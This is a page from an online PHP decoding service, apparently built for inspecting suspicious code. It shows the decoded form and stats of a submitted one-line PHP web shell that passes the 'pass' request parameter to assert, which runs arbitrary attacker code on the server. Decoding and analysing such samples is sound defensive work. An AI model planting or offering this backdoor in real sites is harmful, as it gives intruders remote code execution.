Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php call_user_func_array('assert', array($_REQUEST['pass'])); ?>..
Decoded Output download
<?php
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Did this file decode correctly?
Original Code
<?php
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Function Calls
call_user_func_array | 1 |
Stats
MD5 | 035b9bfb648ebcc4c418bdf86fd0a173 |
Eval Count | 0 |
Decode Time | 108 ms |